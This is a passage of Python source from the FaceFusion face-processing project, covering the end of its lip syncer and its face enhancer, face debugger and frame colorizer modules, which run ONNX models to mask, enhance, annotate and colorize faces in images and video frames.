-= numpy.abs(bounding_box[3] - bounding_box[1]) * 0.125 mouth_mask = create_mouth_mask(face_landmark_68) crop_mask_list.append(mouth_mask) box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], facefusion.globals.face_mask_blur, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) close_vision_frame, close_matrix = warp_face_by_bounding_box(crop_vision_frame, bounding_box, (96, 96)) close_vision_frame = prepare_crop_frame(close_vision_frame) with conditional_thread_semaphore(facefusion.globals.execution_providers): close_vision_frame = frame_processor.run(None, { 'source': temp_audio_frame, 'target': close_vision_frame })[0] crop_vision_frame = normalize_crop_frame(close_vision_frame) crop_vision_frame = cv2.warpAffine(crop_vision_frame, cv2.invertAffineTransform(close_matrix), (512, 512), borderMode = cv2.BORDER_REPLICATE) crop_mask = numpy.minimum.reduce(crop_mask_list) paste_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) return paste_vision_frame def prepare_audio_frame(temp_audio_frame : AudioFrame) -> AudioFrame: temp_audio_frame = numpy.maximum(numpy.exp(-5 * numpy.log(10)), temp_audio_frame) temp_audio_frame = numpy.log10(temp_audio_frame) * 1.6 + 3.2 temp_audio_frame = temp_audio_frame.clip(-4, 4).astype(numpy.float32) temp_audio_frame = numpy.expand_dims(temp_audio_frame, axis = (0, 1)) return temp_audio_frame def prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = numpy.expand_dims(crop_vision_frame, axis = 0) prepare_vision_frame = crop_vision_frame.copy() prepare_vision_frame[:, 48:] = 0 crop_vision_frame = numpy.concatenate((prepare_vision_frame, crop_vision_frame), axis = 3) crop_vision_frame = crop_vision_frame.transpose(0, 3, 1, 2).astype('float32') / 255.0 return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame[0].transpose(1, 2, 0) crop_vision_frame = crop_vision_frame.clip(0, 1) * 255 crop_vision_frame = crop_vision_frame.astype(numpy.uint8) return crop_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : LipSyncerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') source_audio_frame = inputs.get('source_audio_frame') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = sync_lip(target_face, source_audio_frame, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = sync_lip(target_face, source_audio_frame, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = sync_lip(similar_face, source_audio_frame, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in 
facefusion.globals.face_selector_mode else None source_audio_path = get_first(filter_audio_paths(source_paths)) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) for queue_payload in process_manager.manage(queue_payloads): frame_number = queue_payload['frame_number'] target_vision_path = queue_payload['frame_path'] source_audio_frame = get_voice_frame(source_audio_path, temp_video_fps, frame_number) if not numpy.any(source_audio_frame): source_audio_frame = create_empty_audio_frame() target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None source_audio_frame = create_empty_audio_frame() target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: source_audio_paths = filter_audio_paths(facefusion.globals.source_paths) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) for source_audio_path in source_audio_paths: read_static_voice(source_audio_path, temp_video_fps) frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/__init__.py File: facefusion/processors/frame/modules/face_enhancer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import get_many_faces, clear_face_analyser, find_similar_faces, get_one_face from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, clear_face_occluder from facefusion.face_helper import warp_face_by_face_landmark_5, paste_back from facefusion.execution import apply_execution_provider_options from facefusion.content_analyser import clear_content_analyser from facefusion.face_store import get_reference_faces from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, is_image, is_video, resolve_relative_path from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image from facefusion.processors.frame.typings import FaceEnhancerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'codeformer': { 'url': 
'https://github.com/facefusion/facefusion-assets/releases/download/models/codeformer.onnx', 'path': resolve_relative_path('../.assets/models/codeformer.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.2': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.2.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.2.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.3': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.3.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.3.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gfpgan_1.4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gfpgan_1.4.onnx', 'path': resolve_relative_path('../.assets/models/gfpgan_1.4.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gpen_bfr_256': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_256.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_256.onnx'), 'template': 'arcface_128_v2', 'size': (256, 256) }, 'gpen_bfr_512': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_512.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_512.onnx'), 'template': 'ffhq_512', 'size': (512, 512) }, 'gpen_bfr_1024': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_1024.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_1024.onnx'), 'template': 'ffhq_512', 'size': (1024, 1024) }, 'gpen_bfr_2048': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/gpen_bfr_2048.onnx', 'path': resolve_relative_path('../.assets/models/gpen_bfr_2048.onnx'), 'template': 'ffhq_512', 'size': (2048, 2048) }, 'restoreformer_plus_plus': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/restoreformer_plus_plus.onnx', 'path': resolve_relative_path('../.assets/models/restoreformer_plus_plus.onnx'), 'template': 'ffhq_512', 'size': (512, 512) } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.face_enhancer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--face-enhancer-model', help = wording.get('help.face_enhancer_model'), default = config.get_str_value('frame_processors.face_enhancer_model', 'gfpgan_1.4'), choices = frame_processors_choices.face_enhancer_models) program.add_argument('--face-enhancer-blend', help = wording.get('help.face_enhancer_blend'), type = int, default = config.get_int_value('frame_processors.face_enhancer_blend', '80'), choices = frame_processors_choices.face_enhancer_blend_range, metavar = create_metavar(frame_processors_choices.face_enhancer_blend_range)) def 
apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_enhancer_model = args.face_enhancer_model frame_processors_globals.face_enhancer_blend = args.face_enhancer_blend def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() def enhance_face(target_face: Face, temp_vision_frame : VisionFrame) -> VisionFrame: model_template = get_options('model').get('template') model_size = get_options('model').get('size') crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), model_template, model_size) box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], facefusion.globals.face_mask_blur, (0, 0, 0, 0)) crop_mask_list =\ [ box_mask ] if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) crop_vision_frame = prepare_crop_frame(crop_vision_frame) crop_vision_frame = apply_enhance(crop_vision_frame) crop_vision_frame = normalize_crop_frame(crop_vision_frame) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) paste_vision_frame = paste_back(temp_vision_frame, crop_vision_frame, crop_mask, affine_matrix) temp_vision_frame = blend_frame(temp_vision_frame, paste_vision_frame) return temp_vision_frame def apply_enhance(crop_vision_frame : VisionFrame) -> VisionFrame: frame_processor = get_frame_processor() frame_processor_inputs = {} for frame_processor_input in frame_processor.get_inputs(): if frame_processor_input.name == 'input': frame_processor_inputs[frame_processor_input.name] = crop_vision_frame if frame_processor_input.name == 'weight': weight = numpy.array([ 1 ]).astype(numpy.double) frame_processor_inputs[frame_processor_input.name] = weight with thread_semaphore(): crop_vision_frame = frame_processor.run(None, frame_processor_inputs)[0][0] return crop_vision_frame def 
prepare_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = crop_vision_frame[:, :, ::-1] / 255.0 crop_vision_frame = (crop_vision_frame - 0.5) / 0.5 crop_vision_frame = numpy.expand_dims(crop_vision_frame.transpose(2, 0, 1), axis = 0).astype(numpy.float32) return crop_vision_frame def normalize_crop_frame(crop_vision_frame : VisionFrame) -> VisionFrame: crop_vision_frame = numpy.clip(crop_vision_frame, -1, 1) crop_vision_frame = (crop_vision_frame + 1) / 2 crop_vision_frame = crop_vision_frame.transpose(1, 2, 0) crop_vision_frame = (crop_vision_frame * 255.0).round() crop_vision_frame = crop_vision_frame.astype(numpy.uint8)[:, :, ::-1] return crop_vision_frame def blend_frame(temp_vision_frame : VisionFrame, paste_vision_frame : VisionFrame) -> VisionFrame: face_enhancer_blend = 1 - (frame_processors_globals.face_enhancer_blend / 100) temp_vision_frame = cv2.addWeighted(temp_vision_frame, face_enhancer_blend, paste_vision_frame, 1 - face_enhancer_blend, 0) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: return enhance_face(target_face, temp_vision_frame) def process_frame(inputs : FaceEnhancerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = enhance_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = enhance_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = enhance_face(similar_face, target_vision_frame) return target_vision_frame def process_frames(source_path : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_path : str, target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(None, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/face_debugger.py from typing import Any, List, Literal from argparse import ArgumentParser import cv2 import numpy import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, wording from 
facefusion.face_analyser import get_one_face, get_many_faces, find_similar_faces, clear_face_analyser from facefusion.face_masker import create_static_box_mask, create_occlusion_mask, create_region_mask, clear_face_occluder, clear_face_parser from facefusion.face_helper import warp_face_by_face_landmark_5, categorize_age, categorize_gender from facefusion.face_store import get_reference_faces from facefusion.content_analyser import clear_content_analyser from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, QueuePayload from facefusion.vision import read_image, read_static_image, write_image from facefusion.processors.frame.typings import FaceDebuggerInputs from facefusion.processors.frame import globals as frame_processors_globals, choices as frame_processors_choices NAME = __name__.upper() def get_frame_processor() -> None: pass def clear_frame_processor() -> None: pass def get_options(key : Literal['model']) -> None: pass def set_options(key : Literal['model'], value : Any) -> None: pass def register_args(program : ArgumentParser) -> None: program.add_argument('--face-debugger-items', help = wording.get('help.face_debugger_items').format(choices = ', '.join(frame_processors_choices.face_debugger_items)), default = config.get_str_list('frame_processors.face_debugger_items', 'face-landmark-5/68 face-mask'), choices = frame_processors_choices.face_debugger_items, nargs = '+', metavar = 'FACE_DEBUGGER_ITEMS') def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.face_debugger_items = args.face_debugger_items def pre_check() -> bool: return True def post_check() -> bool: return True def pre_process(mode : ProcessMode) -> bool: return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate': clear_frame_processor() if facefusion.globals.video_memory_strategy == 'strict': clear_face_analyser() clear_content_analyser() clear_face_occluder() clear_face_parser() def debug_face(target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: primary_color = (0, 0, 255) secondary_color = (0, 255, 0) tertiary_color = (255, 255, 0) bounding_box = target_face.bounding_box.astype(numpy.int32) temp_vision_frame = temp_vision_frame.copy() has_face_landmark_5_fallback = numpy.array_equal(target_face.landmarks.get('5'), target_face.landmarks.get('5/68')) has_face_landmark_68_fallback = numpy.array_equal(target_face.landmarks.get('68'), target_face.landmarks.get('68/5')) if 'bounding-box' in frame_processors_globals.face_debugger_items: cv2.rectangle(temp_vision_frame, (bounding_box[0], bounding_box[1]), (bounding_box[2], bounding_box[3]), primary_color, 2) if 'face-mask' in frame_processors_globals.face_debugger_items: crop_vision_frame, affine_matrix = warp_face_by_face_landmark_5(temp_vision_frame, target_face.landmarks.get('5/68'), 'arcface_128_v2', (512, 512)) inverse_matrix = cv2.invertAffineTransform(affine_matrix) temp_size = temp_vision_frame.shape[:2][::-1] crop_mask_list = [] if 'box' in facefusion.globals.face_mask_types: box_mask = create_static_box_mask(crop_vision_frame.shape[:2][::-1], 0, facefusion.globals.face_mask_padding) crop_mask_list.append(box_mask) if 'occlusion' in facefusion.globals.face_mask_types: occlusion_mask = create_occlusion_mask(crop_vision_frame) crop_mask_list.append(occlusion_mask) if 'region' in facefusion.globals.face_mask_types: region_mask = 
create_region_mask(crop_vision_frame, facefusion.globals.face_mask_regions) crop_mask_list.append(region_mask) crop_mask = numpy.minimum.reduce(crop_mask_list).clip(0, 1) crop_mask = (crop_mask * 255).astype(numpy.uint8) inverse_vision_frame = cv2.warpAffine(crop_mask, inverse_matrix, temp_size) inverse_vision_frame = cv2.threshold(inverse_vision_frame, 100, 255, cv2.THRESH_BINARY)[1] inverse_vision_frame[inverse_vision_frame > 0] = 255 inverse_contours = cv2.findContours(inverse_vision_frame, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)[0] cv2.drawContours(temp_vision_frame, inverse_contours, -1, tertiary_color if has_face_landmark_5_fallback else secondary_color, 2) if 'face-landmark-5' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('5')): face_landmark_5 = target_face.landmarks.get('5').astype(numpy.int32) for index in range(face_landmark_5.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_5[index][0], face_landmark_5[index][1]), 3, primary_color, -1) if 'face-landmark-5/68' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('5/68')): face_landmark_5_68 = target_face.landmarks.get('5/68').astype(numpy.int32) for index in range(face_landmark_5_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_5_68[index][0], face_landmark_5_68[index][1]), 3, tertiary_color if has_face_landmark_5_fallback else secondary_color, -1) if 'face-landmark-68' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('68')): face_landmark_68 = target_face.landmarks.get('68').astype(numpy.int32) for index in range(face_landmark_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_68[index][0], face_landmark_68[index][1]), 3, tertiary_color if has_face_landmark_68_fallback else secondary_color, -1) if 'face-landmark-68/5' in frame_processors_globals.face_debugger_items and numpy.any(target_face.landmarks.get('68')): face_landmark_68 = target_face.landmarks.get('68/5').astype(numpy.int32) for index in range(face_landmark_68.shape[0]): cv2.circle(temp_vision_frame, (face_landmark_68[index][0], face_landmark_68[index][1]), 3, primary_color, -1) if bounding_box[3] - bounding_box[1] > 50 and bounding_box[2] - bounding_box[0] > 50: top = bounding_box[1] left = bounding_box[0] - 20 if 'face-detector-score' in frame_processors_globals.face_debugger_items: face_score_text = str(round(target_face.scores.get('detector'), 2)) top = top + 20 cv2.putText(temp_vision_frame, face_score_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) if 'face-landmarker-score' in frame_processors_globals.face_debugger_items: face_score_text = str(round(target_face.scores.get('landmarker'), 2)) top = top + 20 cv2.putText(temp_vision_frame, face_score_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, tertiary_color if has_face_landmark_5_fallback else secondary_color, 2) if 'age' in frame_processors_globals.face_debugger_items: face_age_text = categorize_age(target_face.age) top = top + 20 cv2.putText(temp_vision_frame, face_age_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) if 'gender' in frame_processors_globals.face_debugger_items: face_gender_text = categorize_gender(target_face.gender) top = top + 20 cv2.putText(temp_vision_frame, face_gender_text, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, primary_color, 2) return temp_vision_frame def get_reference_frame(source_face : Face, target_face : Face, temp_vision_frame : VisionFrame) -> VisionFrame: pass def process_frame(inputs : 
FaceDebuggerInputs) -> VisionFrame: reference_faces = inputs.get('reference_faces') target_vision_frame = inputs.get('target_vision_frame') if facefusion.globals.face_selector_mode == 'many': many_faces = get_many_faces(target_vision_frame) if many_faces: for target_face in many_faces: target_vision_frame = debug_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'one': target_face = get_one_face(target_vision_frame) if target_face: target_vision_frame = debug_face(target_face, target_vision_frame) if facefusion.globals.face_selector_mode == 'reference': similar_faces = find_similar_faces(reference_faces, target_vision_frame, facefusion.globals.reference_face_distance) if similar_faces: for similar_face in similar_faces: target_vision_frame = debug_face(similar_face, target_vision_frame) return target_vision_frame def process_frames(source_paths : List[str], queue_payloads : List[QueuePayload], update_progress : UpdateProgress) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None for queue_payload in process_manager.manage(queue_payloads): target_vision_path = queue_payload['frame_path'] target_vision_frame = read_image(target_vision_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(target_vision_path, output_vision_frame) update_progress(1) def process_image(source_paths : List[str], target_path : str, output_path : str) -> None: reference_faces = get_reference_faces() if 'reference' in facefusion.globals.face_selector_mode else None target_vision_frame = read_static_image(target_path) output_vision_frame = process_frame( { 'reference_faces': reference_faces, 'target_vision_frame': target_vision_frame }) write_image(output_path, output_vision_frame) def process_video(source_paths : List[str], temp_frame_paths : List[str]) -> None: frame_processors.multi_process_frames(source_paths, temp_frame_paths, process_frames) File: facefusion/processors/frame/modules/frame_colorizer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import clear_face_analyser from facefusion.content_analyser import clear_content_analyser from facefusion.execution import apply_execution_provider_options from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, resolve_relative_path, is_image, is_video from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image, unpack_resolution from facefusion.processors.frame.typings import FrameColorizerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'ddcolor': { 'type': 'ddcolor', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ddcolor.onnx', 'path': 
resolve_relative_path('../.assets/models/ddcolor.onnx') }, 'ddcolor_artistic': { 'type': 'ddcolor', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ddcolor_artistic.onnx', 'path': resolve_relative_path('../.assets/models/ddcolor_artistic.onnx') }, 'deoldify': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify.onnx', 'path': resolve_relative_path('../.assets/models/deoldify.onnx') }, 'deoldify_artistic': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify_artistic.onnx', 'path': resolve_relative_path('../.assets/models/deoldify_artistic.onnx') }, 'deoldify_stable': { 'type': 'deoldify', 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/deoldify_stable.onnx', 'path': resolve_relative_path('../.assets/models/deoldify_stable.onnx') } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.frame_colorizer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--frame-colorizer-model', help = wording.get('help.frame_colorizer_model'), default = config.get_str_value('frame_processors.frame_colorizer_model', 'ddcolor'), choices = frame_processors_choices.frame_colorizer_models) program.add_argument('--frame-colorizer-blend', help = wording.get('help.frame_colorizer_blend'), type = int, default = config.get_int_value('frame_processors.frame_colorizer_blend', '100'), choices = frame_processors_choices.frame_colorizer_blend_range, metavar = create_metavar(frame_processors_choices.frame_colorizer_blend_range)) program.add_argument('--frame-colorizer-size', help = wording.get('help.frame_colorizer_size'), type = str, default = config.get_str_value('frame_processors.frame_colorizer_size', '256x256'), choices = frame_processors_choices.frame_colorizer_sizes) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.frame_colorizer_model = args.frame_colorizer_model frame_processors_globals.frame_colorizer_blend = args.frame_colorizer_blend frame_processors_globals.frame_colorizer_size = args.frame_colorizer_size def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + 
wording.get('exclamation_mark'), NAME)
        return False
    if not is_file(model_path):
        logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME)
        return False
    return True


def pre_process(mode : ProcessMode) -> bool:
    if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path):
        logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME)
        return False
    if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path):
        logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME)
        return False
    return True


def post_process() -> None:
    read_static_image.cache_clear()
    if facefusion.globals.video_memory_strategy == 'strict' or facefusion.globals.video_memory_strategy == 'moderate':
        clear_frame_processor()
    if facefusion.globals.video_memory_strategy == 'strict':
        clear_face_analyser()
        clear_content_analyser()


def colorize_frame(temp_vision_frame : VisionFrame) -> VisionFrame:
    frame_processor = get_frame_processor()
    prepare_vision_frame = prepare_temp_frame(temp_vision_frame)
    with thread_semaphore():
        color_vision_frame = frame_processor.run(None,
        {
            frame_processor.get_inputs()[0].name: prepare_vision_frame
        })[0][0]
    color_vision_frame = merge_color_frame(temp_vision_frame, color_vision_frame)
    color_vision_frame = blend_frame(temp_vision_frame, color_vision_frame)
    return color_vision_frame


def prepare_temp_frame(temp_vision_frame : VisionFrame) -> VisionFrame:
    model_size = unpack_resolution(frame_processors_globals.frame_colorizer_size)
    model_type = get_options('model').get('type')
    temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_BGR2GRAY)
    temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_GRAY2RGB)
    if model_type == 'ddcolor':
        temp_vision_frame = (temp_vision_frame / 255.0).astype(numpy.float32)
        temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_RGB2LAB)[:, :, :1]
        temp_vision_frame = numpy.concatenate((temp_vision_frame, numpy.zeros_like(temp_vision_frame), numpy.zeros_like(temp_vision_frame)), axis = -1)
        temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_LAB2RGB)
    temp_vision_frame = cv2.resize(temp_vision_frame, model_size)
    temp_vision_frame = temp_vision_frame.transpose((2, 0, 1))
    temp_vision_frame = numpy.expand_dims(temp_vision_frame, axis = 0).astype(numpy.float32)
    return temp_vision_frame


def merge_color_frame(temp_vision_frame : VisionFrame, color_vision_frame : VisionFrame) -> VisionFrame:
    model_type = get_options('model').get('type')
    color_vision_frame = color_vision_frame.transpose(1, 2, 0)
    color_vision_frame = cv2.resize(color_vision_frame, (temp_vision_frame.shape[1], temp_vision_frame.shape[0]))
    if model_type == 'ddcolor':
        temp_vision_frame = (temp_vision_frame / 255.0).astype(numpy.float32)
        temp_vision_frame = cv2.cvtColor(temp_vision_frame, cv2.COLOR_BGR2LAB)[:, :, :1]
        color_vision_frame = numpy.concatenate((temp_vision_frame, color_vision_frame), axis = -1)
        color_vision_frame = cv2.cvtColor(color_vision_frame, cv2.COLOR_LAB2BGR)
        color_vision_frame = (color_vision_frame * 255.0).round().astype(numpy.uint8)
    if model_type == 'deoldify':
        temp_blue_channel, _, _ = cv2.split(temp_vision_frame)
